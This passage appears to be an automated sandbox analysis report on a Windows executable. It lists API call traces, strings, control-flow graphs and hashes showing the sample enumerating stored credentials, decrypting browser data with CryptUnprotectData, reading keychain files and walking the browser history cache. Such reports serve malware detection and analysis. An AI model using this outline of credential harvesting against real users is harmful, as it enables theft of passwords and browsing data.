                                                                                                                                                                                      • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                      • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                      • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                      • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                      • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                                      • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                      • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                                      • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                    • memset.MSVCRT ref: 0044573D
                                                                                                                                                                                    • memset.MSVCRT ref: 00445755
                                                                                                                                                                                    • memset.MSVCRT ref: 004458CB
                                                                                                                                                                                    • memset.MSVCRT ref: 004458E3
                                                                                                                                                                                    • memset.MSVCRT ref: 0044596E
                                                                                                                                                                                    • memset.MSVCRT ref: 00445A10
                                                                                                                                                                                    • memset.MSVCRT ref: 00445A28
                                                                                                                                                                                    • memset.MSVCRT ref: 00445AC6
                                                                                                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                      • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                      • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                                                                                      • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                                                      • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                      • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                    • memset.MSVCRT ref: 00445B52
                                                                                                                                                                                    • memset.MSVCRT ref: 00445B6A
                                                                                                                                                                                    • memset.MSVCRT ref: 00445C9B
                                                                                                                                                                                    • memset.MSVCRT ref: 00445CB3
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                                                    • memset.MSVCRT ref: 00445B82
                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                                                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                                                    • memset.MSVCRT ref: 00445986
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                                                                    • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                                                    • API String ID: 1963886904-3798722523
                                                                                                                                                                                    • Opcode ID: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                                                                                                    • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                                                                                                    • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                                                                                                                    Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                                                                                                                      • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                      • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                                                                                                                      • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                    • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                                                                                                                                                                    • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                                                    • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                                                    • API String ID: 2744995895-28296030
                                                                                                                                                                                    • Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                                                                                                                    • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                                                    • Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                                                                                                                    • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                                                                                                                    Function 0040B6EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388fileCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                      • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                                                      • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                                                    • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                    • memset.MSVCRT ref: 0040B756
                                                                                                                                                                                    • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                    • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                    • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                                                                                                    • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                                                                                                    • memset.MSVCRT ref: 0040B851
                                                                                                                                                                                    • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                                                    • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                                                                                                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                      • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                                                                                    • memset.MSVCRT ref: 0040BB53
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                                                                                                                                                                    • String ID: chp$v10
                                                                                                                                                                                    • API String ID: 1297422669-2783969131
                                                                                                                                                                                    • Opcode ID: 2d8d3858acf8204944681f745a2db0da9034132aea09d7a248e8269e324108d5
                                                                                                                                                                                    • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d8d3858acf8204944681f745a2db0da9034132aea09d7a248e8269e324108d5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                                                                                                                                    Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 504 40e2ab-40e2d5 call 40695d call 406b90 509 40e4a0-40e4af call 4069a3 504->509 510 40e2db-40e300 504->510 511 40e304-40e30f call 406e8f 510->511 515 40e314-40e316 511->515 516 40e476-40e483 call 406b53 515->516 517 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 515->517 523 40e302 516->523 524 40e489-40e495 call 40aa04 516->524 541 40e3c9-40e3ce 517->541 542 40e39d-40e3ae call 40742e 517->542 523->511 524->509 529 40e497-40e49f free 524->529 529->509 544 40e3d0-40e3d6 541->544 545 40e3d9-40e3de 541->545 551 40e3b0 542->551 552 40e3b3-40e3c1 wcschr 542->552 544->545 547 40e3e0-40e3f1 memcpy 545->547 548 40e3f4-40e3f9 545->548 547->548 549 40e3fb-40e40c memcpy 548->549 550 40e40f-40e414 548->550 549->550 553 40e416-40e427 memcpy 550->553 554 40e42a-40e42f 550->554 551->552 552->541 555 40e3c3-40e3c6 552->555 553->554 556 40e431-40e442 memcpy 554->556 557 40e445-40e44a 554->557 555->541 556->557 558 40e44c-40e45b 557->558 559 40e45e-40e463 557->559 558->559 559->516 560 40e465-40e469 559->560 560->516 561 40e46b-40e473 560->561 561->516
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                    • free.MSVCRT ref: 0040E49A
                                                                                                                                                                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E380
                                                                                                                                                                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                      • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                    • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,761F2EE0), ref: 0040E3EC
                                                                                                                                                                                    • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,761F2EE0), ref: 0040E407
                                                                                                                                                                                    • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,761F2EE0), ref: 0040E422
                                                                                                                                                                                    • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,761F2EE0), ref: 0040E43D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                                                                    • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                                                    • API String ID: 3849927982-2252543386
                                                                                                                                                                                    • Opcode ID: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                                                                                                    • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                                                                                                    • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                                                                                    Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 562 4091b8-40921b memset call 40a6e6 call 444432 567 409520-409526 562->567 568 409221-40923b call 40b273 call 438552 562->568 572 409240-409248 568->572 573 409383-4093ab call 40b273 call 438552 572->573 574 40924e-409258 call 4251c4 572->574 586 4093b1 573->586 587 4094ff-40950b call 443d90 573->587 579 40937b-40937e call 424f26 574->579 580 40925e-409291 call 4253cf * 2 call 4253af * 2 574->580 579->573 580->579 610 409297-409299 580->610 590 4093d3-4093dd call 4251c4 586->590 587->567 596 40950d-409511 587->596 597 4093b3-4093cc call 4253cf * 2 590->597 598 4093df 590->598 596->567 600 409513-40951d call 408f2f 596->600 597->590 613 4093ce-4093d1 597->613 602 4094f7-4094fa call 424f26 598->602 600->567 602->587 610->579 612 40929f-4092a3 610->612 612->579 614 4092a9-4092ba 612->614 613->590 617 4093e4-4093fb call 4253af * 2 613->617 615 4092bc 614->615 616 4092be-4092e3 memcpy memcmp 614->616 615->616 618 409333-409345 memcmp 616->618 619 4092e5-4092ec 616->619 617->602 627 409401-409403 617->627 618->579 622 409347-40935f memcpy 618->622 619->579 621 4092f2-409331 memcpy * 2 619->621 624 409363-409378 memcpy 621->624 622->624 624->579 627->602 628 409409-40941b memcmp 627->628 628->602 629 409421-409433 memcmp 628->629 630 4094a4-4094b6 memcmp 629->630 631 409435-40943c 629->631 630->602 633 4094b8-4094ed memcpy * 2 630->633 631->602 632 409442-4094a2 memcpy * 3 631->632 634 4094f4 632->634 633->634 634->602
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004091E2
                                                                                                                                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                    • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                                                                    • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                                                                    • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                                                                                                    • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                                                                    • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3715365532-3916222277
                                                                                                                                                                                    • Opcode ID: 0b5d2420ae1e05a47c945b1ba07dbbc3733902293ebddf2e47a1979dcc9084dd
                                                                                                                                                                                    • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b5d2420ae1e05a47c945b1ba07dbbc3733902293ebddf2e47a1979dcc9084dd
                                                                                                                                                                                    • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                                                                                                    Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                      • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                      • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                      • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                                      • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                      • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                    • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                    • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                      • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                      • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                      • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                                                                                    • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                    • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                    • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                                    • String ID: bhv
                                                                                                                                                                                    • API String ID: 4234240956-2689659898
                                                                                                                                                                                    • Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                                                                                                    • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                                                    • Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                                                                                                    • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                                                                                                                    Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 691 413f4f-413f52 692 413fa5 691->692 693 413f54-413f5a call 40a804 691->693 695 413f5f-413fa4 GetProcAddress * 5 693->695 695->692
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                    • API String ID: 2941347001-70141382
                                                                                                                                                                                    • Opcode ID: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                                                                                                    • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                                                                                                    • Opcode Fuzzy Hash: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                                                                                                    • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                                                                                                                                                    Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040C298
                                                                                                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                    • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                                                    • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                                                                                    • String ID: visited:
                                                                                                                                                                                    • API String ID: 2470578098-1702587658
                                                                                                                                                                                    • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
